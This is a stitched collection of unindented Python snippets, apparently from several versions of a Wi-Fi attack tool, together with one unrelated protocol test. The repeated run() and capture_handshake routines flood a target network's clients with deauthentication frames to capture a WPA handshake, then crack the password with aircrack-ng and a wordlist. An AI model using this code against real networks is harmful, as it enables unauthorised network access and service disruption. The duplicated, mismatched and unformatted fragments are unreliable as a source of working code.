def testAnalyze(self):
hs_file = self.getFile('handshake_exists.cap')
print hs_file
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
try:
hs.analyze()
except Exception, e:
fail()
def testAnalyze(self):
hs_file = self.getFile('handshake_exists.cap')
print hs_file
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
try:
hs.analyze()
except Exception, e:
fail()
def load_handshake(self, bssid, essid):
if not os.path.exists(Configuration.wpa_handshake_dir):
return None
if essid:
essid_safe = re.escape(re.sub('[^a-zA-Z0-9]', '', essid))
else:
essid_safe = '[a-zA-Z0-9]+'
bssid_safe = re.escape(bssid.replace(':', '-'))
date = '\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2}'
get_filename = re.compile('handshake_%s_%s_%s\.cap' % (essid_safe, bssid_safe, date))
for filename in os.listdir(Configuration.wpa_handshake_dir):
cap_filename = os.path.join(Configuration.wpa_handshake_dir, filename)
if os.path.isfile(cap_filename) and re.match(get_filename, filename):
return Handshake(capfile=cap_filename, bssid=bssid, essid=essid)
return None
def run(self):
'''
Initiates full WPA hanshake capture attack.
'''
# Check if user only wants to run PixieDust attack
if Configuration.pixie_only and self.target.wps:
Color.pl('{!} {O}--pixie{R} set, ignoring WPA-handshake attack')
self.success = False
return self.success
# First, start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
skip_wash=True,
output_file_prefix='wpa') as airodump:
Color.clear_entire_line()
Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...")
airodump_target = self.wait_for_target(airodump)
self.clients = []
handshake = None
timeout_timer = Timer(Configuration.wpa_attack_timeout)
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
while handshake is None and not timeout_timer.ended():
step_timer = Timer(1)
Color.clear_entire_line()
Color.pattack("WPA",
airodump_target,
"Handshake capture",
"Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})" % (len(self.clients), deauth_timer, timeout_timer))
# Find .cap file
cap_files = airodump.find_files(endswith='.cap')
if len(cap_files) == 0:
# No cap files yet
time.sleep(step_timer.remaining())
continue
cap_file = cap_files[0]
# Copy .cap file to temp for consistency
temp_file = Configuration.temp('handshake.cap.bak')
copy(cap_file, temp_file)
# Check cap file in temp for Handshake
bssid = airodump_target.bssid
essid = airodump_target.essid if airodump_target.essid_known else None
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
if handshake.has_handshake():
# We got a handshake
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
break
# There is no handshake
handshake = None
# Delete copied .cap file in temp to save space
os.remove(temp_file)
# Look for new clients
airodump_target = self.wait_for_target(airodump)
for client in airodump_target.clients:
if client.station not in self.clients:
Color.clear_entire_line()
Color.pattack("WPA",
airodump_target,
"Handshake capture",
"Discovered new client: {G}%s{W}" % client.station)
Color.pl("")
self.clients.append(client.station)
# Send deauth to a client or broadcast
if deauth_timer.ended():
self.deauth(airodump_target)
# Restart timer
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
# Sleep for at-most 1 second
time.sleep(step_timer.remaining())
continue # Handshake listen+deauth loop
if not handshake:
# No handshake, attack failed.
Color.pl("\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds" % (Configuration.wpa_attack_timeout))
self.success = False
return self.success
# Save copy of handshake to ./hs/
self.save_handshake(handshake)
# Print analysis of handshake file
Color.pl('\n{+} analysis of captured handshake file:')
handshake.analyze()
# Try to crack handshake
key = self.crack_handshake(handshake, Configuration.wordlist)
if key is None:
self.success = False
else:
self.crack_result = CrackResultWPA(bssid, essid, handshake.capfile, key)
self.crack_result.dump()
self.success = True
return self.success
def testHandshakeAircrack(self):
hs_file = self.getFile('handshake_exists.cap')
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
assert (len(hs.aircrack_handshakes()) > 0)
def testHandshakeCowpatty(self):
hs_file = self.getFile('handshake_exists.cap')
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
hs.divine_bssid_and_essid()
assert (len(hs.cowpatty_handshakes()) > 0)
def test_creation(self):
h = Handshake("test-app", "1.2.3", "test-node", 1234567890,
"127.0.0.1:12345", 1234567890)
self.assertEqual(
b"0000003b08746573742d61707000000001000000020000000309746573742d6e6f646500000000499602d2000000087f0000010000303900000000499602d2",
binascii.hexlify(h.get_bytes()))
def capture_handshake(self):
''' Returns captured or stored handshake, otherwise None '''
handshake = None
# First, start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
skip_wps=True,
output_file_prefix='wpa') as airodump:
Color.clear_entire_line()
Color.pattack("WPA", self.target, "Handshake capture", "Waiting for target to appear...")
airodump_target = self.wait_for_target(airodump)
self.clients = []
# Try to load existing handshake
if Configuration.ignore_old_handshakes == False:
bssid = airodump_target.bssid
essid = airodump_target.essid if airodump_target.essid_known else None
handshake = self.load_handshake(bssid=bssid, essid=essid)
if handshake:
Color.pattack("WPA", self.target, "Handshake capture", "found {G}existing handshake{W} for {C}%s{W}" % handshake.essid)
Color.pl('\n{+} Using handshake from {C}%s{W}' % handshake.capfile)
return handshake
timeout_timer = Timer(Configuration.wpa_attack_timeout)
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
while handshake is None and not timeout_timer.ended():
step_timer = Timer(1)
Color.clear_entire_line()
Color.pattack("WPA",
airodump_target,
"Handshake capture",
"Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})" % (len(self.clients), deauth_timer, timeout_timer))
# Find .cap file
cap_files = airodump.find_files(endswith='.cap')
if len(cap_files) == 0:
# No cap files yet
time.sleep(step_timer.remaining())
continue
cap_file = cap_files[0]
# Copy .cap file to temp for consistency
temp_file = Configuration.temp('handshake.cap.bak')
copy(cap_file, temp_file)
# Check cap file in temp for Handshake
bssid = airodump_target.bssid
essid = airodump_target.essid if airodump_target.essid_known else None
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
if handshake.has_handshake():
# We got a handshake
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
break
# There is no handshake
handshake = None
# Delete copied .cap file in temp to save space
os.remove(temp_file)
# Look for new clients
airodump_target = self.wait_for_target(airodump)
for client in airodump_target.clients:
if client.station not in self.clients:
Color.clear_entire_line()
Color.pattack("WPA",
airodump_target,
"Handshake capture",
"Discovered new client: {G}%s{W}" % client.station)
Color.pl("")
self.clients.append(client.station)
# Send deauth to a client or broadcast
if deauth_timer.ended():
self.deauth(airodump_target)
# Restart timer
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
# Sleep for at-most 1 second
time.sleep(step_timer.remaining())
continue # Handshake listen+deauth loop
if handshake is None:
# No handshake, attack failed.
Color.pl("\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds" % (Configuration.wpa_attack_timeout))
return handshake
else:
# Save copy of handshake to ./hs/
self.save_handshake(handshake)
return handshake
def testHandshakeAircrack(self):
hs_file = self.getFile('handshake_exists.cap')
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
assert(len(hs.aircrack_handshakes()) > 0)
def testHandshakeCowpatty(self):
hs_file = self.getFile('handshake_exists.cap')
hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A')
hs.divine_bssid_and_essid()
assert(len(hs.cowpatty_handshakes()) > 0)
def run(self):
'''
Initiates full WPA hanshake capture attack.
'''
# Check if user only wants to run PixieDust attack
if Configuration.pixie_only and self.target.wps:
Color.pl('{!} {O}--pixie{R} set, ignoring WPA-handshake attack')
self.success = False
return self.success
# First, start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
output_file_prefix='wpa') as airodump:
Color.clear_entire_line()
Color.pattack("WPA", self.target, "Handshake capture",
"Waiting for target to appear...")
airodump_target = self.wait_for_target(airodump)
# Get client station MAC addresses
clients = [c.station for c in airodump_target.clients]
client_index = 0
handshake = None
time_since_deauth = time.time()
deauth_proc = None
while True:
if not deauth_proc or deauth_proc.poll() != None:
# Clear line only if we're not deauthing right now
Color.clear_entire_line()
Color.pattack("WPA", airodump_target, "Handshake capture",
"Waiting for handshake...")
#Color.p('\r{+} {C}WPA-handshake attack{W}: ')
#Color.p('waiting for {C}handshake{W}...')
time.sleep(1)
# Find .cap file
cap_files = airodump.find_files(endswith='.cap')
if len(cap_files) == 0:
# No cap files yet
continue
cap_file = cap_files[0]
# Copy .cap file to temp for consistency
temp_file = Configuration.temp('handshake.cap.bak')
copy(cap_file, temp_file)
# Check cap file in temp for Handshake
bssid = airodump_target.bssid
essid = None
if airodump_target.essid_known:
essid = airodump_target.essid
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
if handshake.has_handshake():
# We got a handshake
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
break
# There is no handshake
handshake = None
# Delete copied .cap file in temp to save space
os.remove(temp_file)
# Check status of deauth process
if deauth_proc and deauth_proc.poll() == None:
# Deauth process is still running
time_since_deauth = time.time()
# Look for new clients
airodump_target = self.wait_for_target(airodump)
for client in airodump_target.clients:
if client.station not in clients:
Color.clear_entire_line()
Color.pl(
'\r{+} discovered new {G}client{W}: {C}%s{W}' %
client.station)
clients.append(client.station)
# Send deauth to a client or broadcast
if time.time(
) - time_since_deauth > Configuration.wpa_deauth_timeout:
# We are N seconds since last deauth was sent,
# And the deauth process is not running.
if len(clients) == 0 or client_index >= len(clients):
deauth_proc = self.deauth(bssid)
client_index = 0
else:
client = clients[client_index]
deauth_proc = self.deauth(bssid, client)
client_index += 1
time_since_deauth = time.time()
continue
# Stop the deauth process if needed
if deauth_proc and deauth_proc.poll() == None:
deauth_proc.interrupt()
if not handshake:
# No handshake, attack failed.
self.success = False
return self.success
key = None
# Save copy of handshake to ./hs/
self.save_handshake(handshake)
# Print analysis of handshake file
Color.pl('\n{+} analysis of captured handshake file:')
handshake.analyze()
# Crack handshake
wordlist = Configuration.wordlist
if wordlist != None:
wordlist_name = wordlist.split(os.sep)[-1]
if not os.path.exists(wordlist):
Color.pl('{!} {R}unable to crack:' +
' wordlist {O}%s{R} does not exist{W}' % wordlist)
else:
# We have a wordlist we can use
Color.p('\n{+} {C}cracking handshake{W}' +
' using {C}aircrack-ng{W}' +
' with {C}%s{W} wordlist' % wordlist_name)
# TODO: More-verbose cracking status
# 1. Read number of lines in 'wordlist'
# 2. Pipe aircrack stdout to file
# 3. Read from file every second, get keys tried so far
# 4. Display # of keys tried / total keys, and ETA
key_file = Configuration.temp('wpakey.txt')
command = [
'aircrack-ng', '-a', '2', '-w', wordlist, '-l',
key_file, handshake.capfile
]
aircrack = Process(command, devnull=True)
aircrack.wait()
if os.path.exists(key_file):
# We cracked it.
Color.pl('\n\n{+} {G}successfully cracked PSK{W}\n')
f = open(key_file, 'r')
key = f.read()
f.close()
else:
Color.pl('\n{!} {R}handshake crack failed:' +
' {O}%s did not contain password{W}' %
wordlist.split(os.sep)[-1])
self.crack_result = CrackResultWPA(bssid, essid, handshake.capfile,
key)
self.crack_result.dump()
self.success = True
return self.success
def run(self):
"""
Initiates full WPA hanshake capture attack.
"""
# Check if user only wants to run PixieDust attack
if Configuration.pixie_only and self.target.wps:
Color.pl("{!} {O}--pixie{R} set, ignoring WPA-handshake attack")
self.success = False
return self.success
# First, start Airodump process
with Airodump(
channel=self.target.channel, target_bssid=self.target.bssid, skip_wash=True, output_file_prefix="wpa"
) as airodump:
Color.clear_line()
Color.p("\r{+} {C}WPA-handshake attack{W}: ")
Color.p("{O}waiting{W} for target to appear...")
airodump_target = self.wait_for_target(airodump)
# Get client station MAC addresses
clients = [c.station for c in airodump_target.clients]
client_index = 0
handshake = None
time_since_deauth = time.time()
deauth_proc = None
while True:
if not deauth_proc or deauth_proc.poll() != None:
# Clear line only if we're not deauthing right now
Color.p("\r%s\r" % (" " * 90))
Color.p("\r{+} {C}WPA-handshake attack{W}: ")
Color.p("waiting for {C}handshake{W}...")
time.sleep(1)
# Find .cap file
cap_files = airodump.find_files(endswith=".cap")
if len(cap_files) == 0:
# No cap files yet
continue
cap_file = cap_files[0]
# Copy .cap file to temp for consistency
temp_file = Configuration.temp("handshake.cap.bak")
copy(cap_file, temp_file)
# Check cap file in temp for Handshake
bssid = airodump_target.bssid
essid = None
if airodump_target.essid_known:
essid = airodump_target.essid
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
if handshake.has_handshake():
# We got a handshake
Color.pl("\n\n{+} {G}successfully captured handshake{W}")
break
# There is no handshake
handshake = None
# Delete copied .cap file in temp to save space
os.remove(temp_file)
# Check status of deauth process
if deauth_proc and deauth_proc.poll() == None:
# Deauth process is still running
time_since_deauth = time.time()
# Look for new clients
airodump_target = self.wait_for_target(airodump)
for client in airodump_target.clients:
if client.station not in clients:
Color.pl("\r{+} discovered {G}client{W}:" + " {C}%s{W}%s" % (client.station, " " * 10))
clients.append(client.station)
# Send deauth to a client or broadcast
if time.time() - time_since_deauth > Configuration.wpa_deauth_timeout:
# We are N seconds since last deauth was sent,
# And the deauth process is not running.
if len(clients) == 0 or client_index >= len(clients):
deauth_proc = self.deauth(bssid)
client_index = 0
else:
client = clients[client_index]
deauth_proc = self.deauth(bssid, client)
client_index += 1
time_since_deauth = time.time()
continue
# Stop the deauth process if needed
if deauth_proc and deauth_proc.poll() == None:
deauth_proc.interrupt()
if not handshake:
# No handshake, attack failed.
self.success = False
return self.success
key = None
# Save copy of handshake to ./hs/
self.save_handshake(handshake)
# Print analysis of handshake file
Color.pl("\n{+} analysis of captured handshake file:")
handshake.analyze()
# Crack handshake
wordlist = Configuration.wordlist
if wordlist != None:
wordlist_name = wordlist.split(os.sep)[-1]
if not os.path.exists(wordlist):
Color.pl("{!} {R}unable to crack:" + " wordlist {O}%s{R} does not exist{W}" % wordlist)
else:
# We have a wordlist we can use
Color.p(
"\n{+} {C}cracking handshake{W}"
+ " using {C}aircrack-ng{W}"
+ " with {C}%s{W} wordlist" % wordlist_name
)
# TODO: More-verbose cracking status
# 1. Read number of lines in 'wordlist'
# 2. Pipe aircrack stdout to file
# 3. Read from file every second, get keys tried so far
# 4. Display # of keys tried / total keys, and ETA
key_file = Configuration.temp("wpakey.txt")
command = ["aircrack-ng", "-a", "2", "-w", wordlist, "-l", key_file, handshake.capfile]
aircrack = Process(command, devnull=True)
aircrack.wait()
if os.path.exists(key_file):
# We cracked it.
Color.pl("\n\n{+} {G}successfully cracked PSK{W}\n")
f = open(key_file, "r")
key = f.read()
f.close()
else:
Color.pl(
"\n{!} {R}handshake crack failed:"
+ " {O}%s did not contain password{W}" % wordlist.split(os.sep)[-1]
)
self.crack_result = CrackResultWPA(bssid, essid, handshake.capfile, key)
self.crack_result.dump()
self.success = True
return self.success
def run(self):
'''
Initiates full WPA hanshake capture attack.
'''
# Check if user only wants to run PixieDust attack
if Configuration.pixie_only and self.target.wps:
Color.pl('{!} {O}--pixie{R} set, ignoring WPA-handshake attack')
self.success = False
return self.success
# First, start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
skip_wash=True,
output_file_prefix='wpa') as airodump:
Color.clear_entire_line()
Color.pattack("WPA", self.target, "Handshake capture",
"Waiting for target to appear...")
airodump_target = self.wait_for_target(airodump)
self.clients = []
handshake = None
timeout_timer = Timer(Configuration.wpa_attack_timeout)
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
while handshake is None and not timeout_timer.ended():
step_timer = Timer(1)
Color.clear_entire_line()
Color.pattack(
"WPA", airodump_target, "Handshake capture",
"Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})"
% (len(self.clients), deauth_timer, timeout_timer))
# Find .cap file
cap_files = airodump.find_files(endswith='.cap')
if len(cap_files) == 0:
# No cap files yet
time.sleep(step_timer.remaining())
continue
cap_file = cap_files[0]
# Copy .cap file to temp for consistency
temp_file = Configuration.temp('handshake.cap.bak')
copy(cap_file, temp_file)
# Check cap file in temp for Handshake
bssid = airodump_target.bssid
essid = airodump_target.essid if airodump_target.essid_known else None
handshake = Handshake(temp_file, bssid=bssid, essid=essid)
if handshake.has_handshake():
# We got a handshake
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
break
# There is no handshake
handshake = None
# Delete copied .cap file in temp to save space
os.remove(temp_file)
# Look for new clients
airodump_target = self.wait_for_target(airodump)
for client in airodump_target.clients:
if client.station not in self.clients:
Color.clear_entire_line()
Color.pattack(
"WPA", airodump_target, "Handshake capture",
"Discovered new client: {G}%s{W}" % client.station)
Color.pl("")
self.clients.append(client.station)
# Send deauth to a client or broadcast
if deauth_timer.ended():
self.deauth(airodump_target)
# Restart timer
deauth_timer = Timer(Configuration.wpa_deauth_timeout)
# Sleep for at-most 1 second
time.sleep(step_timer.remaining())
continue # Handshake listen+deauth loop
if not handshake:
# No handshake, attack failed.
Color.pl(
"\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds"
% (Configuration.wpa_attack_timeout))
self.success = False
return self.success
# Save copy of handshake to ./hs/
self.save_handshake(handshake)
# Print analysis of handshake file
Color.pl('\n{+} analysis of captured handshake file:')
handshake.analyze()
# Try to crack handshake
key = self.crack_handshake(handshake, Configuration.wordlist)
if key is None:
self.success = False
else:
self.crack_result = CrackResultWPA(bssid, essid,
handshake.capfile, key)
self.crack_result.dump()
self.success = True
return self.success